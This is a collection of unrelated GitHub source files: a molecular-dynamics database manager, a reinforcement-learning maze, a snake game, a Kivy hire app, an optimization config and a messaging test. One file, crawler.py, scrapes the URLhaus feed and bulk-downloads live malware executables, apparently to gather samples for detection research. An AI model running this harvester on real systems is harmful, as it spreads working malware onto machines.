self.md_templ/ff_fname\n self.ff_start = ff_start\n self.ff_end = ff_end\n self.df_ff =self._read_ff_file(self.ff_fpath)\n\n self.node_fpath = self.root/node_fname\n\n print(f\"\\t Checking {node_fname} file...\", end=\"\")\n if os.path.exists(self.node_fpath):\n print(\"Exists! ... \", end=\"\")\n try:\n self._check_node_f(self.node_fpath)\n except:\n er_mes = f\"{self.node_fpath} does not correspond to grid_spec!\" + \\\n f\"Check {self.root/node_fname}\"\n print(er_mes)\n raise ValueError(0, er_mes)\n else:\n print(\"success!\")\n else:\n print(f\"Not found! Creating {node_fname} according to grid_spec ... \", end=\"\")\n try:\n self._save_node_f()\n except:\n er_mes = f\"could not create {self.node_fpath}\"\n print(er_mes)\n raise OSError(0, er_mes)\n else:\n print(\"success!\") \n\n \n print(f\"Initialization: database {self.root} ... \", end=\"\")\n if os.path.exists(self.node_fpath):\n print(f\"already exists! Checking {node_fname} file ....\")\n self._check_node_f(self.node_fpath)\n print(\"Success! 
Database manager is created!!!\")\n\n    def casedir_exists(self, multiidx):\n        \"\"\"\n        check if there is a directory with the name specified by multiidx\n        \"\"\"\n        casename = self.make_casename(multiidx)\n        casepath = self.root/casename\n        return os.path.exists(casepath)\n    \n    def check_inclusion(self, pdict):\n        \"\"\"\n        checks if point with coordinates pdict = {resid : {param_name : param_value}} \n        is inside of the search space defined by self.grid_spec\n        \"\"\"\n        plist = self.convert_to_plist(pdict)\n        for i in range(len(plist)):\n            resid, param_name = self.params[i]\n            xi = plist[i]\n            low_b, high_b = self.bounds[i]\n            assert (xi >= low_b and xi <= high_b), f\"Point out of the bound ({resid}, {param_name})!\"\n        return True\n\n    def convert_to_pdict(self, plist):\n        \"\"\"\n        converts point coordinates given as a list (plist) to coordinates \n        as a dict (pdict), according to self.params order \n        \"\"\"\n        pdict = {}\n        for i, (resid, param_name) in enumerate(self.params):\n            param_value = plist[i]\n            pdict[resid] = pdict[resid] if resid in pdict else {}\n            pdict[resid].update({param_name: param_value})\n        return pdict\n\n    def convert_to_plist(self, pdict):\n        \"\"\"\n        converts point coordinates given as a dict (pdict) to coordinates \n        as a list (plist), according to self.params order \n        \"\"\"\n        plist = []\n        for resid, param_name in self.params:\n            param_value = pdict[resid][param_name]\n            plist.append(param_value)\n        return plist \n\n    def create_case(self, pdict):\n        \"\"\"\n        Creates a folder with name corresponding to pdict. If the folder exists,\n        throws a warning. \n        Parameters:\n        -----------\n        pdict : dict\n            dict of parameter values - coordinates, {resid : {param_name : param_value}} \n        Returns:\n        --------\n        path to casedir as str / None if casedir wasn't created\n        \"\"\"\n        multiidx = self.get_multiidx(pdict)\n        if not multiidx:\n            return None\n\n        casename = self.make_casename(multiidx)\n        ff_fname = self.ff_fpath.name\n        casepath = self.root/casename\n\n        if not self.check_inclusion(pdict):\n            print(\"RANGE ERROR!\")\n            return None\n        if self.casedir_exists(multiidx):\n            print(f\"DataManager Warning! The casedir {casename} already exists,\",\n                  \"no changes are made.\",\n                  \"The existing MD configuration will be used\")\n            return casepath\n        else:\n            shutil.copytree(self.md_templ, self.root/casename)\n\n        df_ff_new = self.df_ff.copy()\n        for i, (resid, param_name) in enumerate(self.params):\n            idx = multiidx[i]\n            param_val = self.nodes[i][idx]\n            df_ff_new.at[resid, param_name] = '{:6.5e}'.format(param_val)\n\n        ff_fpath_new = casepath/ff_fname\n        self._save_ff_file(df_ff_new, ff_fpath_new)\n        return casepath\n    \n    def get_multiidx(self, pdict):\n        \"\"\"\n        checks inclusion of point pdict and assigns the multiindex of the nearest\n        vertex if the point is included.\n        WARNING! It is assumed that a point is located near one of the vertices. \n        The accuracy of assignments for points in between is not guaranteed. 
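\n        Example (hypothetical values): with grid_spec = {\"Li\": {\"sigma\": [0.0, 0.5, 3]}}\n        the nodes along this axis are [0.0, 0.25, 0.5], so the point\n        pdict = {\"Li\": {\"sigma\": 0.25}} maps to the multiindex (1,).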
\n        Parameters\n        ----------\n        pdict : dictionary\n            dict of parameter values - coordinates, {resid : {param_name : param_value}} \n        Returns\n        -------\n        tuple / None\n            returns tuple of int-indices or None if point doesn't belong to the search space\n        \"\"\"\n        if not self.check_inclusion(pdict):\n            return None\n        \n        multiidx = []\n        for i, (resid, par) in enumerate(self.params):\n            nodes_i = self.nodes[i]\n            nodes_i = np.array(nodes_i)\n            xi = pdict[resid][par]\n            idx = np.abs(nodes_i-xi).argmin()\n            if not np.isclose(nodes_i[idx], xi):\n                print(\"WARNING: get_multiidx: nodes coordinates don't match with point coordinates.\", \n                      \"However, the closest multiidx is found and ff parameters\",\n                      \"are set according to the grid node at this multiidx \")\n            multiidx.append(idx)\n        return tuple(multiidx)\n    \n    def get_node_dict(self):\n        \"\"\"\n        Returns a dictionary with node coordinates for each resid and parameter, \n        {resid : {param_name : node_coords}}\n        \"\"\" \n        node_dict = {}\n        for resid in self.grid_spec:\n            node_dict[resid] = {}\n            for param_name in self.grid_spec[resid]:\n                x_min, x_max, Nx = self.grid_spec[resid][param_name]\n                node_coord_i = np.linspace(x_min, x_max, Nx)\n                node_coord_i = list(node_coord_i) # json doesn't save np.arrays as entries\n                node_dict[resid][param_name] = node_coord_i\n        return node_dict\n\n    def make_casename(self, multiidx):\n        \"\"\"\n        creates a case name according to the specified multiidx\n        Parameters:\n        -----------\n        multiidx - list\n            list of idx for each resid and parameter\n        Returns:\n            str as IDX1_IDX2_.._IDXN\n        \"\"\"\n        casename = f'{multiidx[0] :03d}' \n        for idx in multiidx[1:]:\n            casename += f'_{idx :03d}'\n        return casename \n\n    def _check_node_f(self, node_fpath):\n        \"\"\"\n        checks whether grid_spec from a given json file is equivalent to self.grid_spec\n        Parameters\n        ----------\n        node_fpath - str\n            a filepath to a file with written node coordinates for each parameter\n        \"\"\"\n        node_coord_ext = self._read_node_f(node_fpath)\n\n        ndim_ext = 0\n        for i, (resid, param_name) in enumerate(self.params):\n            coord_i = self.nodes[i]\n            coord_i_ext = node_coord_ext[resid][param_name]\n            if not np.allclose(coord_i, coord_i_ext):\n                er_mes = f\"_check_node_f: nodes coordinates do not match with {node_fpath}!\"\n                print(er_mes)\n                raise ValueError(0, er_mes)\n            ndim_ext += 1\n\n        if ndim_ext != self.ndim:\n            er_mes = f\"_check_node_f: dimension mismatch! 
Check {node_fpath}!\"\n            print(er_mes)\n            raise KeyError(0, er_mes)\n        return True\n\n    def _read_ff_file(self, ff_fpath):\n        \"\"\"\n        Reads the specified ff file as a pandas DataFrame\n        \"\"\"\n        with open(ff_fpath, 'r',) as f:\n            lines = f.readlines()\n        df = pd.DataFrame(data=[l.split()[1:] for l in lines[self.ff_start:self.ff_end][1:]])\n        col_names = lines[self.ff_start][1:]\n        col_names = col_names.split()[1:]\n        col_ind = list(range(df.shape[1]))\n        col_dict = dict(zip(col_ind, col_names))\n        \n        row_names = [l.split()[0] for l in lines[self.ff_start:self.ff_end][1:]]\n        row_ind = list(range(df.shape[0]))\n        row_dict = dict(zip(row_ind, row_names))\n        df = df.rename(columns=col_dict, index=row_dict)\n        return df\n    \n    def _read_node_f(self, node_fpath):\n        \"\"\"\n        reads a json file with node coordinates as a dict\n        \"\"\"\n        with open(node_fpath) as node_f:\n            node_dict = json.loads(node_f.read())\n        return node_dict\n\n    def _save_ff_file(self, df, ff_fpath_out):\n        \"\"\"\n        writes ff parameters as a pandas DataFrame into a specified ff file\n        Parameters:\n        ----------\n        df - pandas.DataFrame\n            dataframe with specified resid, parameter names and values\n        ff_fpath_out - str\n            path to the ff file to write ff parameters to\n        \"\"\"\n        with open(ff_fpath_out, 'r',) as f:\n            lines = f.readlines()\n        for i in range(self.ff_start, self.ff_start+df.shape[0]):\n            l = list(df.iloc[i-self.ff_start])\n            l = [df.index[i-self.ff_start]] + l\n            form = ['', '\\t', '\\t', '\\t', '\\t', '\\t', '\\t']\n            l = [item for sublist in zip(form,l) for item in sublist]\n            l = ''.join(l)\n            lines[i+1] = l + '\\n'\n        \n        with open(ff_fpath_out, 'w') as f_out:\n            for l in lines:\n                f_out.write(l)\n        \n    def _save_node_f(self):\n        \"\"\"\n        writes the dict with node coordinates self.nodes as a json file\n        (only if the file does not exist)\n        Returns\n        -------\n        True if data are successfully saved, False otherwise\n        \"\"\"\n        if self.node_fpath.exists():\n            print(\"File already exists!\")\n            return False\n\n        node_dict = self.get_node_dict()\n        print(node_dict)\n        with open(self.node_fpath, \"w\") as node_f:\n            json.dump(node_dict, node_f)\n        return True\n    \n","repo_name":"evgenii-f/MD-opt","sub_path":"lib/DataManager.py","file_name":"DataManager.py","file_ext":"py","file_size_in_byte":14937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"44266270061","text":"#site - https://urlhaus.abuse.ch/browse/\nimport os\nimport re\nimport time\nimport hashlib\nimport requests\nfrom tqdm import tqdm\nfrom random import randint\nfrom bs4 import BeautifulSoup as bs\n\nfor x in range(2, 70000, 1):\n    url = \"https://urlhaus.abuse.ch/browse/page/%s/\" % x\n    print(url)\n    response = requests.get(url)\n    #print(response.text)\n    soup = bs(response.text, 'html.parser')\n    table = soup.find('table', {'class': 'table'})\n    download_link = []\n\n    for row in table.findAll('a'):\n        malware = re.findall('^http.*exe$', str(row.get_text()))\n        if malware:\n            download_link = malware\n\n    print(download_link)\n\n    # download malware\n    for malware in download_link:\n        res = requests.get(malware, stream=True)\n\n        with open(\"../win_virus/malware\", \"wb\") as handle:\n            for data in tqdm(res.iter_content()):\n                handle.write(data)\n\n        with open(\"../win_virus/malware\",\"rb\") as f:\n            file_bytes = f.read()  # read the entire file as bytes\n            readable_hash = hashlib.sha256(file_bytes).hexdigest()  # rename the sample to its sha256 hash\n            new_name = \"../win_virus/%s\" % readable_hash\n            os.rename(\"../win_virus/malware\", new_name)\n\n    # go to next page\n    
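# randomized 12-17 s pause between result pages keeps the request rate low\n    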
time.sleep(randint(12,17))\n","repo_name":"integralstar/AI_Vaccine","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72078761768","text":"'''\nDaniel Vogler\n\nrlmaze.py\nRL learning setup and algo\n\n'''\n\nimport numpy as np\nimport logging\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import InputLayer\nfrom tensorflow.keras.layers import Dense\nfrom .settings import Settings\nfrom .utils import Utils\n\n\n\nclass RLMaze: \n\n def __init__(self,\n cfg_file):\n self.PROJECT_ROOT = Settings().PROJECT_ROOT\n self.PACKAGE_ROOT = Settings().PACKAGE_ROOT\n\n self.cfg = Settings().config( cfg_file )\n\n ### environment\n self.actions = { 0: [0,1], 1: [0,-1], 2: [1,0], 3: [-1,0] }\n self.states = tf.convert_to_tensor( self.cfg.maze_grid.flatten(), np.int64)\n\n ### maze properties\n self.cfg.maze_dim = self.cfg.maze_grid.shape\n self.maze_start = tf.convert_to_tensor( [[self.cfg.maze_start[0] * self.cfg.maze_dim[0] + self.cfg.maze_start[1]]], np.int64)\n self.maze_finish = tf.convert_to_tensor( [[self.cfg.maze_finish[0] * self.cfg.maze_dim[0] + self.cfg.maze_finish[1]]], np.int64)\n self.state = self.maze_start\n\n ### dimensions\n self.actions_dim = len(self.actions)\n self.states_dim = len(self.states)\n\n return\n\n \n def escape_maze(self):\n \"\"\" initialize q-learning setup \n \n args:\n\n return:\n - \n \"\"\"\n\n ### construct NN\n model = self.initialize_model(self.states_dim, self.actions_dim)\n\n ### states identity to feed states into NN\n states_identity = np.identity(len(self.states))\n\n epoch_steps = []\n epsilon = self.cfg.epsilon\n\n ### train maze escaping\n for i in range( self.cfg.epochs ):\n\n logging.debug(f'Epoch ({i}/{self.cfg.epochs})')\n\n ### initialize system\n state = self.maze_start\n self.done = False\n action_counter = 0\n\n epsilon *= self.cfg.epsilon_decay\n\n while self.done == False:\n action_counter += 1\n\n ### q-values for current state\n old_state = state\n q_values_old = model.predict( tf.convert_to_tensor( states_identity[state], np.int64), verbose=0 )\n\n ### explore/exploit\n if np.random.uniform(low=0, high=1) < epsilon:\n ### explore -> randomly choose action from discrete action space\n action_arg = np.random.randint(low=0, high=len(self.actions))\n\n else:\n ### exploit -> choose highest scoring action\n action_arg = np.argmax(q_values_old)\n\n ### determine action, get new state + reward\n action = self.actions[ action_arg ]\n state = old_state + action[0] * self.cfg.maze_dim[0] + action[1]\n state, reward = self.compute_reward( old_state, state)\n\n ### q values for new state\n q_values_state = model.predict( tf.convert_to_tensor( states_identity[state], np.int64), verbose=0 )\n\n ### constrain reward if maze is completed\n if self.done == True:\n target = reward\n\n elif self.done == False:\n target = (reward + self.cfg.gamma * np.max( q_values_state ) )\n\n q_values_old[0, action_arg] = target\n\n ### fit model with updated targets\n model.fit( tf.convert_to_tensor( states_identity[old_state], np.int64), q_values_old, epochs=1, verbose=0)\n\n logging.info(f'Epoch ({i}/{self.cfg.epochs}): epsilon ({epsilon}) - actions ({action_counter})')\n\n ### keep track of required steps in epoch\n epoch_steps.append(action_counter)\n\n # self.agent_location(state)\n logging.info(f'Epoch learning: \\n 
{epoch_steps}')\n Utils().plot_epochs(epoch_steps, self.cfg.maze_name)\n\n return\n\n\n def initialize_model(self, state_dim: int, action_dim: int) -> keras.Model:\n \"\"\" Initialize NN model\n \n args: \n - state_dim (int): number of states\n - action_dim (int): number of actions\n \n return:\n - model (keras.Model): NN model to train\n \"\"\"\n\n model = Sequential()\n model.add(InputLayer(batch_input_shape=(1, state_dim)))\n model.add(Dense( self.cfg.layer_nodes, activation='relu'))\n model.add(Dense( self.cfg.layer_nodes, activation='relu'))\n model.add(Dense(action_dim, activation='linear'))\n model.compile(loss='mse', optimizer='adam', metrics=['mae'])\n\n return model\n\n\n def compute_reward(self,\n old_state,\n new_state):\n \"\"\" evaluate performed action\n \n args:\n - state (tuple): state before action was performed\n - new_state (tuple): state after action, has to be checked first\n \n return:\n - state (tuple): return (new) state of agent\n \"\"\"\n\n ### check for maze finish\n if new_state == self.maze_finish:\n new_state = new_state\n reward = self.cfg.reward_finish\n logging.debug('Maze finish')\n self.done = True\n\n ### perform action\n elif tf.gather(self.states, new_state) == 0:\n new_state = new_state\n reward = self.cfg.reward_active\n logging.debug('Move forward - new_state')\n\n ### check for wall\n elif tf.gather(self.states, new_state) == 1:\n new_state = old_state\n reward = self.cfg.reward_wall\n logging.debug('Maze wall - use old_state')\n\n else:\n logging.debug('Maze entry not valid')\n\n return new_state, reward\n\n\n def agent_location(self,\n state):\n \"\"\" agent location\n \n args:\n - state (tuple): current state of agent\n \n return:\n\n \"\"\"\n ### agent location\n agent_loc = np.copy( self.cfg.maze_grid[:] )\n agent_loc[state[0]][state[1]] = 5\n\n logging.info(f'\\n Agent location (5) in maze:\\n{agent_loc}')\n\n return","repo_name":"danielvogler/rl_maze","sub_path":"rlmaze/rlmaze.py","file_name":"rlmaze.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15240317370","text":"from turtle import *\r\nimport time\r\nfrom snake import Snake\r\nfrom food import Food\r\nfrom score import Score\r\n\r\nscreen = Screen()\r\nsetup(600, 600)\r\nbgcolor(\"black\")\r\ntitle(\"Snake Game\")\r\ntracer(0)\r\n\r\n\"\"\"\r\nMethod - 1\r\n\r\nsegment_1 = Turtle(\"square\")\r\nsegment_1.color(\"white\")\r\n\r\nsegment_2 = Turtle(\"square\")\r\nsegment_2.color(\"white\")\r\nsegment_2.goto(-20, 0)\r\n\r\nsegment_3 = Turtle(\"square\")\r\nsegment_3.color(\"white\")\r\nsegment_3.goto(-40, 0)\r\n\"\"\"\r\nsnake = Snake()\r\nfood = Food()\r\nscore = Score()\r\n\r\nlisten()\r\nonkey(snake.up, \"Up\")\r\nonkey(snake.down, \"Down\")\r\nonkey(snake.left, \"Left\")\r\nonkey(snake.right, \"Right\")\r\n\r\nflag = True\r\nwhile flag:\r\n update()\r\n time.sleep(0.1)\r\n snake.move()\r\n \"\"\"collision with food\"\"\"\r\n if snake.head.distance(food) < 15:\r\n food.refresh()\r\n snake.extend()\r\n score.increase()\r\n\r\n \"\"\"collision with wall\"\"\"\r\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\r\n # flag = False\r\n score.reset()\r\n snake.reset()\r\n\r\n \"\"\"collision with tail\"\"\"\r\n for segment in snake.segment[1:]:\r\n if snake.head.distance(segment) < 10:\r\n # flag = False\r\n score.reset()\r\n 
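# tail collision: restart the round (score and snake reset) instead of closing the window\r\n            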
snake.reset()\r\n\r\nscreen.exitonclick()\r\n","repo_name":"swanaa11/Snake_Game","sub_path":"snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15775667675","text":"\r\nfrom kivy.app import App\r\nfrom kivy.lang import Builder\r\nfrom kivy.uix.button import Button\r\nfrom kivy.properties import StringProperty\r\n\r\n__author__ = 'Jiwan Rai'\r\n\r\nclass ItemHireApp(App):\r\n    status_text = StringProperty()\r\n\r\n    def __init__(self):\r\n        super(ItemHireApp, self).__init__()\r\n        self.dicDiscp = {}\r\n        self.dicPrice = {}\r\n        self.dicAvail = {}\r\n\r\n    def build(self):\r\n        self.title = \"ITEM HIRE APP\"\r\n        self.root = Builder.load_file('ItemHire.kv')\r\n        self.file_reader()\r\n        self.create_entry_buttons()\r\n        return self.root\r\n\r\n    def file_reader(self):\r\n        with open(\"items.csv\", 'r') as f:\r\n            lines = f.readlines()\r\n\r\n        for i in lines:\r\n            self.itemName = i.strip().split(',')[0]\r\n            self.discp = i.strip().split(',')[1]\r\n            self.dicDiscp[self.itemName] = self.discp\r\n            self.price = float(i.strip().split(',')[2])\r\n            self.dicPrice[self.itemName] = self.price\r\n            self.availability = i.strip().split(',')[-1]\r\n\r\n            if self.availability == \"out\":\r\n                self.dicAvail[self.itemName] = \"*\"\r\n            else:\r\n                self.dicAvail[self.itemName] = \"\"\r\n\r\n    def add_Item(self, added_name, added_desc, added_number):\r\n        f = open(\"items.csv\", 'a')\r\n        new = added_name+\",\"+added_desc+\",\"+str(added_number)+\",\"+\"in\\n\"\r\n        f.write(new)\r\n        f.close()\r\n\r\n\r\n    def return_item(self):\r\n        for name in self.dicAvail:\r\n            if self.dicAvail[name] == \"*\":\r\n\r\n                temp_button = Button(text=name)\r\n                temp_button.bind(on_release=self.press_entry_return)\r\n                self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n    def press_entry_return(self, instance):\r\n        name = instance.text\r\n        instance.background_color = (1, 1, 0, 1)\r\n        self.dicAvail[name] = \"\"\r\n        self.file_updater()\r\n\r\n\r\n\r\n    def hire_item(self):\r\n        for name in self.dicAvail:\r\n            if self.dicAvail[name] == \"\":\r\n\r\n                temp_button = Button(text=name)\r\n                temp_button.bind(on_release=self.press_entry_hire)\r\n                self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n    def press_entry_hire(self, instance):\r\n        name = instance.text\r\n        instance.background_color = (1, 1, 0, 1)\r\n        self.dicAvail[name] = \"*\"  # mark the item as hired out (\"out\" in the csv)\r\n        self.file_updater()\r\n\r\n\r\n\r\n\r\n    def create_entry_buttons(self):\r\n        for name in self.dicDiscp:\r\n\r\n            temp_button = Button(text=name)\r\n            temp_button.bind(on_release=self.press_entry)\r\n            self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n    def press_entry(self, instance):\r\n        name = instance.text\r\n        self.status_text = \"Item: \" + name + \"\\nDescription: \" + self.dicDiscp[name] + \"\\nPrice:\" + str(self.dicPrice[name])\r\n\r\n    def press_add(self):\r\n\r\n        self.status_text = \"Enter details for new items\"\r\n\r\n        self.root.ids.popup.open()\r\n\r\n    def press_save(self, added_name, added_desc, added_number):\r\n\r\n        self.dicPrice[added_name] = added_number\r\n        self.dicDiscp[added_name] = added_desc\r\n        # change the number of columns based on the number of entries (no more than 5 rows of entries)\r\n        self.root.ids.entriesBox.cols = len(self.dicPrice) // 5 + 1\r\n        # add button for new entry (same as in create_entry_buttons())\r\n        temp_button = Button(text=added_name)\r\n        temp_button.background_color = (1, 1, 0, 1)\r\n        temp_button.bind(on_release=self.press_entry)\r\n        
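# the saved entry is wired to press_entry, so clicking it shows its details like any preloaded item\r\n        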
self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n        self.root.ids.popup.dismiss()\r\n        self.add_Item(added_name, added_desc, added_number)\r\n        self.clear_fields()\r\n\r\n    def file_updater(self):\r\n        with open('items.csv', 'w') as f:\r\n            for name in self.dicDiscp:\r\n                new = name +\",\"+self.dicDiscp[name]+\",\"+str(self.dicPrice[name])+\",\"+self.dicAvail[name]+'\\n'\r\n                f.write(new)\r\n    \r\n\r\n    def clear_fields(self):\r\n\r\n        self.root.ids.addedName.text = \"\"\r\n        self.root.ids.addedNumber.text = \"\"\r\n\r\n    def press_cancel(self):\r\n\r\n        self.root.ids.popup.dismiss()\r\n        self.clear_fields()\r\n        self.status_text = \"\"\r\n\r\n    def exit(self):\r\n        exit()\r\n\r\n\r\n\r\n\r\nItemHireApp().run()\r\n\r\n\r\n\r\n\r\n","repo_name":"JR90/Python","sub_path":"project 1.py","file_name":"project 1.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33999373999","text":"MAX = 10**18\nABC_line = []\n\ndef is_ok(x, K):\n    global ABC_line\n    tmp = 0\n    for ABC in ABC_line:\n        a, b, c = ABC\n        if x < b:\n            continue\n        tmp += max(min(((x - b) // c) + 1, a), 0)\n    # print(f\"{K} < {tmp}\")\n    return (K <= tmp)\n\n# generic binary search template\ndef binary_search(K):\n    left = -1  # index 0 can itself satisfy the condition, so the initial value is -1\n    right = MAX  # index a.size()-1 may fail the condition, so the initial value is a.size() (here MAX)\n\n    while (right - left > 1):\n        mid = left + (right - left) // 2\n        print(f\"l: {left}, r: {right}, m: {mid}\", end=\" -> \")\n\n        if (is_ok(mid, K)):\n            right = mid\n        else:\n            left = mid\n\n    # left ends up as the largest value that fails the condition, right as the smallest value that satisfies it\n    return right\n\n\nif __name__ == '__main__':\n    N, K = map(int, input().split())\n    ans = []\n    for _ in range(N):\n        ABC_line.append(list(map(int, input().split())))\n\n    print(binary_search(K))\n","repo_name":"come2ry/kyopro","sub_path":"PAST/G.py","file_name":"G.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12054999599","text":"from functools import partial\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom cases.sound_waves.microphone_points import Microphone\nfrom gefest.core.configs.optimization_params import OptimizationParams\nfrom gefest.core.configs.tuner_params import TunerParams\nfrom gefest.core.geometry.datastructs.structure import Structure\nfrom gefest.core.geometry.domain import Domain\nfrom gefest.core.geometry.utils import get_random_structure\nfrom gefest.core.opt.objective.objective import Objective\nfrom gefest.tools.estimators.simulators.sound_wave.sound_interface import (\n    SoundSimulator,\n    generate_map,\n)\nfrom gefest.tools.tuners.utils import percent_edge_variance\nfrom gefest.tools.utils import poly_from_comsol_txt\n\n\nclass SoundFieldFitness(Objective):\n    \"\"\"Evaluates sound pressure level difference with reference.\"\"\"\n\n    def __init__(self, domain, estimator, path_best_struct=None, micro_slice=-1):\n        super().__init__(domain, estimator)\n        self.path_best_struct = path_best_struct\n        self.micro_slice = micro_slice\n        if path_best_struct is None:\n            print('please, set up the best spl matrix into configuration')\n            print('the best structure will be generated randomly')\n            rnd_structure = get_random_structure(domain)\n            best_spl = generate_map(domain, rnd_structure)\n        else:\n            best_structure = poly_from_comsol_txt(path_best_struct)\n            best_spl = self.estimator(best_structure)\n            best_spl = np.nan_to_num(best_spl, nan=0, neginf=0, posinf=0)\n            micro = 
Microphone(matrix=best_spl).array()\n best_spl = np.concatenate(micro[micro_slice])\n\n self.best_spl = best_spl\n\n def _evaluate(self, ind: Structure):\n\n spl = self.estimator(ind)\n current_spl = np.nan_to_num(spl, nan=0, neginf=0, posinf=0)\n micro = Microphone(matrix=current_spl).array()\n current_spl = np.concatenate(micro[self.micro_slice])\n l_f = np.sum(np.abs(self.best_spl - current_spl))\n return l_f / len(current_spl)\n\n\n# # # domain pre-computation\n\npass\n\n# # #\n\ndomain_cfg = Domain(\n allowed_area=[\n [20, 20],\n [20, 100],\n [100, 100],\n [100, 20],\n [20, 20],\n ],\n name='main',\n min_poly_num=1,\n max_poly_num=4,\n min_points_num=3,\n max_points_num=16,\n polygon_side=0.001,\n min_dist_from_boundary=0.001,\n geometry_is_convex=True,\n geometry_is_closed=True,\n geometry='2D',\n)\n\n\ntuner_cfg = TunerParams(\n tuner_type='sequential',\n n_steps_tune=10,\n hyperopt_dist='normal',\n verbose=True,\n variacne_generator=partial(percent_edge_variance, percent=0.2),\n timeout_minutes=30,\n)\n\n\nopt_params = OptimizationParams(\n optimizer='gefest_ga',\n domain=domain_cfg,\n tuner_cfg=tuner_cfg,\n n_steps=100,\n pop_size=100,\n postprocess_attempts=3,\n mutation_prob=0.9,\n crossover_prob=0.6,\n mutations=[\n 'rotate_poly',\n 'resize_poly',\n 'add_point',\n 'drop_point',\n 'add_poly',\n 'drop_poly',\n 'pos_change_point',\n ],\n selector='tournament_selection',\n mutation_each_prob=[0.125, 0.125, 0.25, 0.25, 0.0, 0.0, 0.25],\n crossovers=[\n 'polygon_level',\n 'structure_level',\n ],\n crossover_each_prob=[1.0, 0.0],\n postprocess_rules=[\n 'not_out_of_bounds',\n 'valid_polygon_geom',\n 'not_self_intersects',\n 'not_too_close_polygons',\n # 'not_overlaps_prohibited',\n 'not_too_close_points',\n ],\n extra=5,\n estimation_n_jobs=-1,\n n_jobs=11,\n log_dir='logs/tuners_exp',\n run_name='roulette_1_obj',\n golem_keep_histoy=True,\n golem_genetic_scheme_type='steady_state',\n golem_surrogate_each_n_gen=5,\n objectives=[\n SoundFieldFitness(\n domain_cfg,\n SoundSimulator(domain_cfg, 200),\n str(Path(__file__).parent) + '\\\\figures\\\\bottom_square.txt',\n -1,\n ),\n ],\n)\n","repo_name":"aimclub/GEFEST","sub_path":"cases/sound_waves/configuration/config_parallel.py","file_name":"config_parallel.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"38337224964","text":"import threading\nimport unittest\nfrom pydetours.comm import DefaultChannel\nfrom pydetours.dispatcher import Dispatcher\nfrom pydetours.handler import SimpleControlHandler\n\n\nclass Handler(object):\n\n \"\"\" Sugar class to test Dispatching Mechanism. \"\"\"\n\n def __init__(self, id, handle):\n \"\"\" Constructor. \"\"\"\n super(Handler, self).__init__()\n self._id = id\n self._handle = handle\n self._header = None\n\n def handle_event(self):\n \"\"\" Mock handle event. \"\"\"\n evt = self._handle.recv()\n self._header = evt[0]\n if 'True' == self._header.get('payload', 'False'):\n self._payload = [x**self._id for x in evt[1]]\n resp_msg = {'sink': self._id}\n self._handle.send([resp_msg])\n\n def stop(self):\n \"\"\" Free all resources and close handle. \"\"\"\n self._handle.close()\n\n\nclass ReactorDispatcherTestCase(unittest.TestCase):\n\n \"\"\"docstring for ReactorDispatcherTestCase\"unittest.TestCase .\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\" SetUp the whole class. 
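Creates paired client/server channels, maps each server socket to a Handler, and starts the Dispatcher event loop in a background thread. 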
\"\"\"\n cls._clients = {}\n cls._servers = {}\n cls._handlers = {}\n cls._RANGE = 4\n\n for x in range(1, cls._RANGE):\n endpoint = \"ipc:///tmp/%d.ipc\" % x\n cls._clients[x] = DefaultChannel(endpoint)\n cls._servers[x] = DefaultChannel(endpoint)\n cls._clients[x].connect()\n cls._servers[x].bind()\n\n handler_table = {}\n for x in range(1, cls._RANGE):\n server = cls._servers[x]\n handler = Handler(x, server)\n cls._handlers[x] = handler\n handler_table[server.socket] = handler\n\n control_channel = DefaultChannel('ipc:///tmp/control.ipc')\n control_channel.bind()\n control_handler = SimpleControlHandler(control_channel, name='Control')\n my_dispatcher = Dispatcher(handler_table)\n my_dispatcher.control_handler = control_handler\n threading.Thread(target=my_dispatcher.dispatch_events).start()\n\n @classmethod\n def tearDownClass(cls):\n \"\"\" Tear Down the whole class. \"\"\"\n for x in range(1, cls._RANGE):\n cls._clients[x].close()\n cls._servers[x].close()\n\n def dispatch_events_test(self):\n # \"\"\" Test dispatch events. \"\"\"\n handlers = ReactorDispatcherTestCase._handlers\n # msg = \"{\\\"source\\\": \\\"%d\\\", \\\"payload\\\": \\\"False\\\"}\"\n header1 = {'source': '1', 'payload': 'False'}\n\n header2 = {'source': '2', 'payload': 'True'}\n payload2 = bytes([1, 2])\n\n header3 = {'source': '3', 'payload': 'True'}\n payload3 = bytes([1, 2, 3])\n try:\n client1 = ReactorDispatcherTestCase._clients[1]\n client2 = ReactorDispatcherTestCase._clients[2]\n client3 = ReactorDispatcherTestCase._clients[3]\n except KeyError as k:\n self.fail(\"Could not get clients: {0}\".format(k))\n\n client1.send([header1])\n resp1 = client1.recv()\n self.assertEquals(1, resp1[0].get('sink'), 'Sink value wrong.')\n self.assertEquals(header1['source'], handlers[1]._header['source'])\n self.assertEquals(header1['payload'], handlers[1]._header['payload'])\n\n client2.send([header2, payload2])\n resp2 = client2.recv()\n\n self.assertEquals('2', handlers[2]._header['source'])\n self.assertEquals('True', handlers[2]._header['payload'])\n self.assertEquals(payload2[0], handlers[2]._payload[0])\n self.assertEquals(payload2[1]**2, handlers[2]._payload[1])\n 